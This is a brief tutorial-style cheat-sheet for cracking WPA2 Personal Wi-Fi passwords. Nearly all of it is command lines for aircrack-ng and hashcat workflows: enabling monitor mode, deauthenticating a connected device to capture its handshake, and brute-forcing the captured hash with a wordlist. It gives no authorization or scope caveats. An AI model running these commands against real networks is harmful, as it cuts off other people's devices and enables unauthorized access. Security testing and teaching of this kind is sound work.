WPA/WPA2 Personal

WPA2 (Wi-Fi Protected Access II) is a widely used security protocol for securing wireless networks. While it is considered more secure than its predecessor, WPA (Wi-Fi Protected Access), it is not without its vulnerabilities.

Gaining access to a WPA2 Personal network consists of capturing the target network's handshake and brute-forcing the network's secret password. Brute-forcing the secret password can be done using either Aircrack-ng or hashcat.

Note that these attacks were done using a Wi-Fi adapter such as this Alfa Wi-Fi Adapter.

Setup

## Kill processes that may interfere with monitor mode
airmon-ng check kill

## Start Monitor Mode
airmon-ng start [network interface]

Exploit (Aircrack-ng)

## Sniff packets on a specific BSSID and save to a file to analyze
airodump-ng [interface] --bssid [bssid] --channel [channel] --write [output file]

## Deauth a device on the network so we can capture the handshake when it tries to reconnect to the network
aireplay-ng --deauth 10 -a [target network bssid] -c [target device bssid] [interface]

## Use the captured handshake along with a wordlist to try to brute-force the password
aircrack-ng [airodump.cap file] -w [wordlist]

Exploit (hashcat)

## Stop all services that are accessing the WLAN device
systemctl stop NetworkManager.service
systemctl stop wpa_supplicant.service

## Capture Wi-Fi traffic
hcxdumptool -i [interface] -o [outputfile.pcapng] --active_beacon --enable_status=15

## Restart stopped services to regain network connection
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service

## Convert the .pcapng file to Hashcat format 2200
hcxpcapngtool -o [output.hc22000] -E [wordlist output name] [outputfile.pcapng]

## Run Hashcat using the wordlist from the above command and hc22000 output
hashcat -m 22000 [output.hc22000] [wordlist output]